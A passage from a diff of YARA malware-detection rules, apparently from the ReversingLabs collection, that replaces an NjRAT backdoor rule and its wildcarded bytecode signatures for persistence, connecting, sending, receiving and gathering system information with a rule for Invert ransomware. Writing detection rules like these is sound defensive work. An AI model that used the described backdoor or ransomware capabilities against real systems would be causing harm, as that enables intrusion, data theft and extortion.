+		uint16( 0 ) == 0x5A4D and ( ( ( all of ( $encrypt_files_v1_p* ) ) and ( all of ( $find_files_v1_p* ) ) and ( $create_scheduled_task_v1 ) and ( $remote_connection_v1 ) and ( $check_mutex_v1 ) ) or ( ( $find_files_v2 ) and ( all of ( $encrypt_files_v2_p* ) ) and ( $remote_connection_v2 ) and ( all of ( $drop_ransom_note_v2_p* ) ) ) )
 }
-rule REVERSINGLABS_Bytecode_MSIL_Backdoor_Njrat : TC_DETECTION MALICIOUS MALWARE FILE
+rule REVERSINGLABS_Bytecode_MSIL_Ransomware_Invert : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Yara rule that detects NjRAT backdoor."
+		description = "Yara rule that detects Invert ransomware."
 		author = "ReversingLabs"
-		id = "578c813f-4bba-52cd-bcc7-4de2c3943cf7"
-		date = "2024-07-31"
-		modified = "2024-07-31"
+		id = "7ef77946-a902-5dc6-9b3c-b7b6a687eb96"
+		date = "2021-11-11"
+		modified = "2021-11-11"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/backdoor/ByteCode.MSIL.Backdoor.NjRAT.yara#L1-L266"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/ByteCode.MSIL.Ransomware.Invert.yara#L1-L66"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "eeecf90965e6952d8b9efc9d1e96eaa47709b1d69fc7d435f4aebaaf0191f317"
+		logic_hash = "1608b8bbfc03b18a79752e60f211da7d7703862bc06b2ddf094074ae5efd0d14"
 		score = 75
 		quality = 90
 		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
 		category = "MALWARE"
-		tc_detection_type = "Backdoor"
-		tc_detection_name = "NjRAT"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "Invert"
 		tc_detection_factor = 5
 		importance = 25
 
 	strings:
-		$persistence_mechanism_v1_p1 = {
-        00 20 ?? ?? ?? ?? 28 ?? ?? ?? ?? 00 7E ?? ?? ?? ?? 2C ?? 7E ?? ?? ?? ?? 7E ?? ?? ??
-        ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 72 ?? ?? ?? ?? 7E ?? ?? ?? ?? 6F ?? ?? ?? ?? 28 ??
-        ?? ?? ?? 73 ?? ?? ?? ?? 28 ?? ?? ?? ?? 2C ?? 16 2B ?? 17 13 ?? 11 ?? 39 ?? ?? ?? ??
-        00 28 ?? ?? ?? ?? 18 28 ?? ?? ?? ?? 00 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ??
-        7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 13 ?? 11 ?? 2C ?? 7E ?? ?? ?? ?? 28 ??
-        ?? ?? ?? 72 ?? ?? ?? ?? 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 00 7E ?? ?? ??
-        ?? 6F ?? ?? ?? ?? 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 7E ?? ?? ?? ?? 28 ??
-        ?? ?? ?? 17 28 ?? ?? ?? ?? 00 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 7E ?? ??
-        ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 26 28 ?? ?? ?? ?? 00 DE ?? 25 28 ?? ?? ?? ?? 0A
-        00 28 ?? ?? ?? ?? 00 28 ?? ?? ?? ?? DE ?? 00 00 00 1B 8D ?? ?? ?? ?? 13 ?? 11 ?? 16
-        72 ?? ?? ?? ?? A2 00 11 ?? 17 7E ?? ?? ?? ?? 6F ?? ?? ?? ?? A2 00 11 ?? 18 72 ?? ??
-        ?? ?? A2 00 11 ?? 19 7E ?? ?? ?? ?? 6F ?? ?? ?? ?? A2 00 11 ?? 1A 72 ?? ?? ?? ?? A2
-        00 11 ?? 28 ?? ?? ?? ?? 16 16 15 28 ?? ?? ?? ?? 26 DE ?? 25 28 ?? ?? ?? ?? 0B 00 28
-        ?? ?? ?? ?? DE ?? 00 7E ?? ?? ?? ?? 13 ?? 11 ?? 39 ?? ?? ?? ?? 00 7E ?? ?? ?? ?? 6F
-        ?? ?? ?? ?? 6F ?? ?? ?? ?? 7E ?? ?? ?? ?? 17 6F ?? ?? ?? ?? 7E ?? ?? ?? ?? 72 ?? ??
-        ?? ?? 7E ?? ?? ?? ?? 6F ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00
-        DE ?? 25 28 ?? ?? ?? ?? 0C 00 28 ?? ?? ?? ?? DE ?? 00 00 7E ?? ?? ?? ?? 6F ?? ?? ??
-        ?? 6F ?? ?? ?? ?? 7E ?? ?? ?? ?? 17 6F ?? ?? ?? ?? 7E ?? ?? ?? ?? 72 ?? ?? ?? ?? 7E
-        ?? ?? ?? ?? 6F ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 DE ?? 25
-    }
-		$persistence_mechanism_v1_p2 = {
-        28 ?? ?? ?? ?? 0D 00 28 ?? ?? ?? ?? DE ?? 00 00 7E ?? ?? ?? ?? 13 ?? 11 ?? 2C ?? 00
-        28 ?? ?? ?? ?? 18 28 ?? ?? ?? ?? 00 7E ?? ?? ?? ?? 6F ?? ?? ?? ?? 1D 28 ?? ?? ?? ??
-        72 ?? ?? ?? ?? 7E ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 17 28 ?? ?? ?? ?? 00 1D
-        28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 7E ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 19 73 ??
-        ?? ?? ?? 80 ?? ?? ?? ?? DE ?? 25 28 ?? ?? ?? ?? 13 ?? 00 28 ?? ?? ?? ?? DE ?? 00 00
-        7E ?? ?? ?? ?? 13 ?? 11 ?? 2C ?? 72 ?? ?? ?? ?? 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 16 16
-        15 28 ?? ?? ?? ?? 26 00 7E ?? ?? ?? ?? 13 ?? 11 ?? 2C ?? 00 28 ?? ?? ?? ?? 18 28 ??
-        ?? ?? ?? 00 DE ?? 25 28 ?? ?? ?? ?? 13 ?? 00 28 ?? ?? ?? ?? DE ?? 00 00 7E ?? ?? ??
-        ?? 13 ?? 11 ?? 39 ?? ?? ?? ?? 72 ?? ?? ?? ?? 13 ?? 7E ?? ?? ?? ?? 13 ?? 18 13 ?? 28
-        ?? ?? ?? ?? 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 13 ?? 28 ?? ?? ?? ?? 13 ??
-        11 ?? 13 ?? 16 13 ?? 38 ?? ?? ?? ?? 11 ?? 11 ?? 9A 13 ?? 00 28 ?? ?? ?? ?? 11 ?? 11
-        ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 00 11 ?? 11 ?? 28 ?? ?? ?? ?? 11 ?? 28 ?? ?? ?? ??
-        00 DE ?? 25 28 ?? ?? ?? ?? 13 ?? 00 28 ?? ?? ?? ?? DE ?? 00 00 11 ?? 72 ?? ?? ?? ??
-        11 ?? 28 ?? ?? ?? ?? 73 ?? ?? ?? ?? 13 ?? 11 ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 11
-        ?? 72 ?? ?? ?? ?? 11 ?? 11 ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 11 ?? 72 ?? ?? ?? ??
-        11 ?? 28 ?? ?? ?? ?? 17 8C ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 11 ?? 6F ?? ?? ?? ?? 00 11
-        ?? 11 ?? 28 ?? ?? ?? ?? 11 ?? 28 ?? ?? ?? ?? 00 DE ?? 25 28 ?? ?? ?? ?? 13 ?? 00 28
-    }
-		$connect_v1_p1 = {
-        00 16 80 ?? ?? ?? ?? 20 D0 07 00 00 28 ?? ?? ?? ?? 00 7E ?? ?? ?? ?? 0B 00 07 13 ??
-        11 ?? 28 ?? ?? ?? ?? 00 00 00 7E ?? ?? ?? ?? 14 (FE | 01) ?? 16 (FE | 01) ?? 13 ?? 11
-        ?? 2C ?? 00 7E ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 14 80 ?? ?? ?? ?? DE ?? 25 28 ?? ?? ??
-        ?? 0C 00 28 ?? ?? ?? ?? DE ?? 00 00 00 7E ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 DE ?? 25 28
-        ?? ?? ?? ?? 0D 00 28 ?? ?? ?? ?? DE ?? 00 DE ?? 25 28 ?? ?? ?? ?? 13 ?? 00 28 ?? ??
-        ?? ?? DE ?? 00 00 73 ?? ?? ?? ?? 80 ?? ?? ?? ?? 73 ?? ?? ?? ?? 80 ?? ?? ?? ?? 7E ??
-        ?? ?? ?? 20 00 20 03 00 6F ?? ?? ?? ?? 00 7E ?? ?? ?? ?? 20 00 20 03 00 6F ?? ?? ??
-        ?? 00 7E ?? ?? ?? ?? 6F ?? ?? ?? ?? 20 10 27 00 00 6F ?? ?? ?? ?? 00 7E ?? ?? ?? ??
-        6F ?? ?? ?? ?? 20 10 27 00 00 6F ?? ?? ?? ?? 00 7E ?? ?? ?? ?? 14 72 ?? ?? ?? ?? 18
-        8D ?? ?? ?? ?? 13 ?? 11 ?? 16 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ??
-        ?? ?? 28 ?? ?? ?? ?? A2 00 11 ?? 17 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 8C ?? ?? ?? ?? A2
-        00 11 ?? 14 14 14 17 28 ?? ?? ?? ?? 26 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ??
-        28 ?? ?? ?? ?? 80 ?? ?? ?? ?? 17 80 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 26 00
-        72 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 16 28 ??
-        ?? ?? ?? 13 ?? 11 ?? 2C ?? 11 ?? 7F ?? ?? ?? ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ??
-        ?? ?? ?? 13 ?? 2B ?? 00 11 ?? 72 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ??
-        ?? ?? 28 ?? ?? ?? ?? 13 ?? 12 ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 13
-    }
-		$connect_v1_p2 = {
-        00 1F ?? 8D ?? ?? ?? ?? 13 ?? 11 ?? 16 1B 8D ?? ?? ?? ?? 13 ?? 11 ?? 16 11 ?? A2 00
-        11 ?? 17 7E ?? ?? ?? ?? A2 00 11 ?? 18 72 ?? ?? ?? ?? A2 00 11 ?? 19 7E ?? ?? ?? ??
-        A2 00 11 ?? 1A 72 ?? ?? ?? ?? A2 00 11 ?? 28 ?? ?? ?? ?? A2 00 11 ?? 17 7E ?? ?? ??
-        ?? A2 00 11 ?? 18 72 ?? ?? ?? ?? A2 00 11 ?? 19 7E ?? ?? ?? ?? A2 00 11 ?? 1A 72 ??
-        ?? ?? ?? A2 00 11 ?? 1B 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? A2 00 11 ?? 1C 72 ?? ?? ?? ??
-        A2 00 11 ?? 1D 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? A2 00 11 ?? 1E 72 ?? ?? ?? ?? A2 00 11
-        ?? 1F ?? 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? A2 00 11 ?? 1F ?? 72 ?? ?? ?? ?? A2 00 11 ??
-        1F ?? 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? A2 00 11 ?? 1F ?? 72 ?? ?? ?? ?? A2 00 11 ?? 1F
-        ?? 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? A2 00 11 ?? 1F ?? 72 ?? ?? ?? ?? A2 00 11 ?? 1F ??
-        7E ?? ?? ?? ?? 28 ?? ?? ?? ?? A2 00 11 ?? 1F ?? 72 ?? ?? ?? ?? A2 00 11 ?? 1F ?? 7E
-        ?? ?? ?? ?? 28 ?? ?? ?? ?? A2 00 11 ?? 1F ?? 72 ?? ?? ?? ?? A2 00 11 ?? 1F ?? 7E ??
-        ?? ?? ?? 28 ?? ?? ?? ?? A2 00 11 ?? 28 ?? ?? ?? ?? 13 ?? 72 ?? ?? ?? ?? 7E ?? ?? ??
-        ?? 12 ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 26 DE ?? 25 28 ?? ?? ?? ?? 13
-        ?? 00 28 ?? ?? ?? ?? DE ?? 00 DE ?? 25 28 ?? ?? ?? ?? 13 ?? 00 16 80 ?? ?? ?? ?? 28
-        ?? ?? ?? ?? DE ?? 00 00 DE ?? 11 ?? 28 ?? ?? ?? ?? 00 DC 7E ?? ?? ?? ?? 0A 2B ?? 06
-    }
-		$send_v1 = {
-        00 7E ?? ?? ?? ?? 16 (FE | 01) ?? 13 ?? 11 ?? 2C ?? 16 0A 38 ?? ?? ?? ?? 00 00 7E ??
-        ?? ?? ?? 0B 00 07 13 ?? 11 ?? 28 ?? ?? ?? ?? 00 00 7E ?? ?? ?? ?? 16 (FE | 01) ?? 13
-        ?? 11 ?? 2C ?? 16 0A DD ?? ?? ?? ?? 00 73 ?? ?? ?? ?? 13 ?? 02 8E B7 0D 12 ?? 28 ??
-        ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 13 ?? 12 ?? 28 ?? ?? ?? ?? 0C 11 ?? 08 16 08
-        8E B7 6F ?? ?? ?? ?? 00 11 ?? 02 16 02 8E B7 6F ?? ?? ?? ?? 00 7E ?? ?? ?? ?? 6F ??
-        ?? ?? ?? 11 ?? 6F ?? ?? ?? ?? 16 11 ?? 6F ?? ?? ?? ?? B7 16 6F ?? ?? ?? ?? 26 00 DE
-        ?? 11 ?? 28 ?? ?? ?? ?? 00 DC DE ?? 25 28 ?? ?? ?? ?? 13 ?? 00 11 ?? 28 ?? ?? ?? ??
-        00 11 ?? 13 ?? 00 7E ?? ?? ?? ?? 13 ?? 11 ?? 2C ?? 16 80 ?? ?? ?? ?? 7E ?? ?? ?? ??
-        6F ?? ?? ?? ?? 00 00 DE ?? 25 28 ?? ?? ?? ?? 13 ?? 00 28 ?? ?? ?? ?? DE ?? 00 28 ??
-        ?? ?? ?? DE ?? 00 7E ?? ?? ?? ?? 0A 2B ?? 06
-    }
-		$receive_v1_p1 = {
-        00 00 00 72 ?? ?? ?? ?? 80 ?? ?? ?? ?? 7E ?? ?? ?? ?? 14 (FE | 01) ?? 16 (FE | 01) ??
-        13 ?? 11 ?? 39 ?? ?? ?? ?? 15 6A 0A 16 0B 00 00 00 07 17 D6 0B 07 1F ?? (FE | 01) ??
-        13 ?? 11 ?? 2C ?? 16 0B 17 28 ?? ?? ?? ?? 00 00 7E ?? ?? ?? ?? 16 (FE | 01) ?? 13 ??
-        11 ?? 2C ?? 00 DD ?? ?? ?? ?? 00 7E ?? ?? ?? ?? 6F ?? ?? ?? ?? 17 (FE | 04) ?? 13 ??
-        11 ?? 2C ?? 7E ?? ?? ?? ?? 6F ?? ?? ?? ?? 15 16 6F ?? ?? ?? ?? 26 00 00 00 7E ?? ??
-        ?? ?? 6F ?? ?? ?? ?? 16 (FE | 02) ?? 13 ?? 11 ?? 39 ?? ?? ?? ?? 06 15 6A (FE | 01) ??
-        13 ?? 11 ?? 39 ?? ?? ?? ?? 72 ?? ?? ?? ?? 13 ?? 38 ?? ?? ?? ?? 7E ?? ?? ?? ?? 6F ??
-        ?? ?? ?? 6F ?? ?? ?? ?? 13 ?? 00 11 ?? 15 59 13 ?? 11 ?? 45 ?? ?? ?? ?? ?? ?? ?? ??
-        ?? ?? ?? ?? 2B ?? 00 00 DD ?? ?? ?? ?? 2B ?? 00 11 ?? 28 ?? ?? ?? ?? 0A 72 ?? ?? ??
-        ?? 13 ?? 06 16 6A (FE | 01) ?? 13 ?? 11 ?? 2C ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 26 15
-        6A 0A 00 7E ?? ?? ?? ?? 6F ?? ?? ?? ?? 16 (FE | 02) ?? 16 (FE | 01) ?? 13 ?? 11 ?? 2C
-        ?? 38 ?? ?? ?? ?? 00 38 ?? ?? ?? ?? 00 11 ?? 11 ?? 28 ?? ?? ?? ?? 13 ?? 12 ?? 28 ??
-        ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 13 ?? 00 17 13 ?? 11 ?? 3A ??
-        ?? ?? ?? 00 7E ?? ?? ?? ?? 6F ?? ?? ?? ?? 17 D6 17 DA 17 D6 8D ?? ?? ?? ?? 80 ?? ??
-        ?? ?? 06 7E ?? ?? ?? ?? 6F ?? ?? ?? ?? DA 0D 7E ?? ?? ?? ?? 8E B7 6A 09 (FE | 02)
-    }
-		$receive_v1_p2 = {
-        13 ?? 11 ?? 2C ?? 09 17 6A DA B7 17 D6 17 DA 17 D6 8D ?? ?? ?? ?? 80 ?? ?? ?? ?? 00
-        7E ?? ?? ?? ?? 6F ?? ?? ?? ?? 7E ?? ?? ?? ?? 16 7E ?? ?? ?? ?? 8E B7 16 6F ?? ?? ??
-        ?? 0C 7E ?? ?? ?? ?? 7E ?? ?? ?? ?? 16 08 6F ?? ?? ?? ?? 00 7E ?? ?? ?? ?? 6F ?? ??
-        ?? ?? 06 (FE | 01) ?? 13 ?? 11 ?? 2C ?? 15 6A 0A 14 (FE | 06) ?? ?? ?? ?? ?? 73 ?? ??
-        ?? ?? 17 73 ?? ?? ?? ?? 13 ?? 11 ?? 7E ?? ?? ?? ?? 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 00
-        11 ?? 1F ?? 6F ?? ?? ?? ?? 26 7E ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 73 ?? ?? ?? ?? 80 ??
-        ?? ?? ?? 00 38 ?? ?? ?? ?? 00 DE ?? 25 28 ?? ?? ?? ?? 13 ?? 00 28 ?? ?? ?? ?? DE ??
-        00 00 00 00 00 7E ?? ?? ?? ?? 14 (FE | 01) ?? 16 (FE | 01) ?? 13 ?? 11 ?? 2C ?? 7E ??
-        ?? ?? ?? 28 ?? ?? ?? ?? 14 72 ?? ?? ?? ?? 16 8D ?? ?? ?? ?? 14 14 14 17 28 ?? ?? ??
-        ?? 26 14 80 ?? ?? ?? ?? 00 DE ?? 25 28 ?? ?? ?? ?? 13 ?? 00 28 ?? ?? ?? ?? DE ?? 00
-        16 80 ?? ?? ?? ?? 28 ?? ?? ?? ?? 16 (FE | 01) ?? 13 ?? 11 ?? 2C ?? 2B ?? 00 17 80 ??
-        ?? ?? ?? 38 ?? ?? ?? ?? 00
-    }
-		$connect_v2 = {
-        16 80 ?? ?? ?? ?? 20 D0 07 00 00 28 ?? ?? ?? ?? 7E ?? ?? ?? ?? 0A 06 25 13 ?? 28 ??
-        ?? ?? ?? 7E ?? ?? ?? ?? 2C ?? 7E ?? ?? ?? ?? 6F ?? ?? ?? ?? 14 80 ?? ?? ?? ?? DE ??
-        26 DE ?? 7E ?? ?? ?? ?? 6F ?? ?? ?? ?? DE ?? 26 DE ?? DE ?? 26 DE ?? 73 ?? ?? ?? ??
-        80 ?? ?? ?? ?? 73 ?? ?? ?? ?? 80 ?? ?? ?? ?? 7E ?? ?? ?? ?? 20 00 20 03 00 6F ?? ??
-        ?? ?? 7E ?? ?? ?? ?? 20 00 20 03 00 6F ?? ?? ?? ?? 7E ?? ?? ?? ?? 6F ?? ?? ?? ?? 20
-        10 27 00 00 6F ?? ?? ?? ?? 7E ?? ?? ?? ?? 6F ?? ?? ?? ?? 20 10 27 00 00 6F ?? ?? ??
-        ?? 7E ?? ?? ?? ?? 7E ?? ?? ?? ?? 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 17 80
-        ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 26 7E ?? ?? ?? ?? 0B 72 ?? ?? ?? ?? 72 ??
-        ?? ?? ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 16 28 ?? ?? ?? ?? 2C ?? 07 7F ?? ?? ?? ?? 28
-        ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0B 2B ?? 07 0C 72 ?? ?? ?? ?? 72 ?? ?? ??
-        ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0D 08 12 ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ??
-        ?? ?? 0B 1B 8D ?? ?? ?? ?? 13 ?? 11 ?? 16 07 A2 11 ?? 17 7E ?? ?? ?? ?? A2 11 ?? 18
-        72 ?? ?? ?? ?? A2 11 ?? 19 7E ?? ?? ?? ?? A2 11 ?? 1A 72 ?? ?? ?? ?? A2 11 ?? 28 ??
-        ?? ?? ?? 0B 07 7E ?? ?? ?? ?? 6F ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0B 07 7E
-        ?? ?? ?? ?? 6F ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0B 07 72 ?? ?? ?? ?? 28 ??
-        ?? ?? ?? 0B 07 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0B 07 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0B
-        07 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0B 72 ?? ?? ?? ?? 7E ?? ?? ?? ?? 12 ?? 28 ?? ?? ??
-        ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 26 DE ?? 26 DE ?? DE ?? 26 16 80 ?? ?? ?? ?? DE ??
-        DE ?? 11 ?? 28 ?? ?? ?? ?? DC 7E
-    }
-		$receive_v2 = {
-        72 ?? ?? ?? ?? 80 ?? ?? ?? ?? 7E ?? ?? ?? ?? 39 ?? ?? ?? ?? 15 6A 0A 16 0B 07 17 D6
-        0B 07 1F ?? 33 ?? 16 0B 17 28 ?? ?? ?? ?? 7E ?? ?? ?? ?? 39 ?? ?? ?? ?? 7E ?? ?? ??
-        ?? 6F ?? ?? ?? ?? 17 3C ?? ?? ?? ?? 7E ?? ?? ?? ?? 6F ?? ?? ?? ?? 15 16 6F ?? ?? ??
-        ?? 26 38 ?? ?? ?? ?? 06 15 6A 3B ?? ?? ?? ?? 7E ?? ?? ?? ?? 6F ?? ?? ?? ?? 17 D6 8D
-        ?? ?? ?? ?? 80 ?? ?? ?? ?? 06 7E ?? ?? ?? ?? 6F ?? ?? ?? ?? DA 0C 7E ?? ?? ?? ?? 8E
-        69 6A 08 31 ?? 08 17 6A DA B7 17 D6 8D ?? ?? ?? ?? 80 ?? ?? ?? ?? 7E ?? ?? ?? ?? 6F
-        ?? ?? ?? ?? 7E ?? ?? ?? ?? 16 7E ?? ?? ?? ?? 8E 69 16 6F ?? ?? ?? ?? 0D 7E ?? ?? ??
-        ?? 7E ?? ?? ?? ?? 16 09 6F ?? ?? ?? ?? 7E ?? ?? ?? ?? 6F ?? ?? ?? ?? 06 40 ?? ?? ??
-        ?? 15 6A 0A 7E ?? ?? ?? ?? 2D ?? 14 (FE | 06) ?? ?? ?? ?? ?? 73 ?? ?? ?? ?? 80 ?? ??
-        ?? ?? 7E ?? ?? ?? ?? 17 73 ?? ?? ?? ?? 13 ?? 11 ?? 7E ?? ?? ?? ?? 6F ?? ?? ?? ?? 6F
-        ?? ?? ?? ?? 11 ?? 1F ?? 6F ?? ?? ?? ?? 26 7E ?? ?? ?? ?? 6F ?? ?? ?? ?? 73 ?? ?? ??
-        ?? 80 ?? ?? ?? ?? 38 ?? ?? ?? ?? 72 ?? ?? ?? ?? 13 ?? 7E ?? ?? ?? ?? 6F ?? ?? ?? ??
-        6F ?? ?? ?? ?? 13 ?? 11 ?? 15 2E ?? 11 ?? 2C ?? 11 ?? 11 ?? 28 ?? ?? ?? ?? 13 ?? 12
-        ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 13 ?? 2B ?? 11 ?? 28
-        ?? ?? ?? ?? 0A 06 16 6A 33 ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 26 15 6A 0A 7E ?? ?? ??
-        ?? 6F ?? ?? ?? ?? 16 3E ?? ?? ?? ?? 7E ?? ?? ?? ?? 6F ?? ?? ?? ?? 3A ?? ?? ?? ?? DE
-        ?? 26 DE ?? 7E ?? ?? ?? ?? 2C ?? 7E ?? ?? ?? ?? 14 72 ?? ?? ?? ?? 16 8D ?? ?? ?? ??
-        14 14 14 17 28 ?? ?? ?? ?? 26 14 80 ?? ?? ?? ?? DE ?? 26 DE ?? 16 80 ?? ?? ?? ?? 28
-        ?? ?? ?? ?? 2C ?? 17 80
-    }
-		$get_system_information_v2_p1 = {
-        72 ?? ?? ?? ?? 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 0A 72 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ??
-        ?? ?? ?? 72 ?? ?? ?? ?? 16 28 ?? ?? ?? ?? 2C ?? 06 0B 7F ?? ?? ?? ?? 28 ?? ?? ?? ??
-        72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0C 07 12 ?? 28 ?? ?? ?? ?? 7E ?? ?? ??
-        ?? 28 ?? ?? ?? ?? 0A 2B ?? 06 0D 72 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ??
-        ?? ?? ?? 13 ?? 12 ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 13
-        ?? 09 12 ?? 28 ?? ?? ?? ?? 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 0A DE ?? 26 06 13 ?? 28 ??
-        ?? ?? ?? 13 ?? 11 ?? 12 ?? 28 ?? ?? ?? ?? 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 0A DE ?? 06
-        28 ?? ?? ?? ?? 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 0A DE ?? 26 06 72 ?? ?? ?? ?? 7E ?? ??
-        ?? ?? 28 ?? ?? ?? ?? 0A DE ?? 06 28 ?? ?? ?? ?? 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 0A DE
-        ?? 26 06 72 ?? ?? ?? ?? 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 0A DE ?? 06 7E ?? ?? ?? ?? 6F
-        ?? ?? ?? ?? 13 ?? 12 ?? 28 ?? ?? ?? ?? 13 ?? 12 ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 7E
-        ?? ?? ?? ?? 28 ?? ?? ?? ?? 0A DE ?? 26 06 72 ?? ?? ?? ?? 7E ?? ?? ?? ?? 28 ?? ?? ??
-        ?? 0A DE ?? 06 72 ?? ?? ?? ?? 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 0A 06 73 ?? ?? ?? ?? 28
-        ?? ?? ?? ?? 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 0A DE ?? 26 06 72 ?? ?? ?? ?? 28 ?? ?? ??
-        ?? 0A DE ?? 06 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0A 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 72 ??
-        ?? ?? ?? 15 16 28 ?? ?? ?? ?? 13 ?? 11 ?? 8E 69 17 33 ?? 06 72 ?? ?? ?? ?? 28 ?? ??
-        ?? ?? 0A 06 11 ?? 11 ?? 8E 69 17 DA 9A 28 ?? ?? ?? ?? 0A DE ?? 26 06 72
-    }
-		$get_system_information_v2_p2 = {
-        28 ?? ?? ?? ?? 0A DE ?? 1F ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2C ?? 06
-        72 ?? ?? ?? ?? 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 0A 2B ?? 06 72 ?? ?? ?? ?? 7E ?? ?? ??
-        ?? 28 ?? ?? ?? ?? 0A DE ?? 26 06 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 0A DE ?? 28 ?? ?? ??
-        ?? 2C ?? 06 72 ?? ?? ?? ?? 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 0A 2B ?? 06 72 ?? ?? ?? ??
-        7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 0A 06 7E ?? ?? ?? ?? 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 0A
-        06 72 ?? ?? ?? ?? 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 0A 06 28 ?? ?? ?? ?? 7E ?? ?? ?? ??
-        28 ?? ?? ?? ?? 0A 72 ?? ?? ?? ?? 13 ?? 7E ?? ?? ?? ?? 72 ?? ?? ?? ?? 7E ?? ?? ?? ??
-        28 ?? ?? ?? ?? 16 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 13 ?? 16 13 ?? 2B ?? 11 ?? 11 ?? 9A
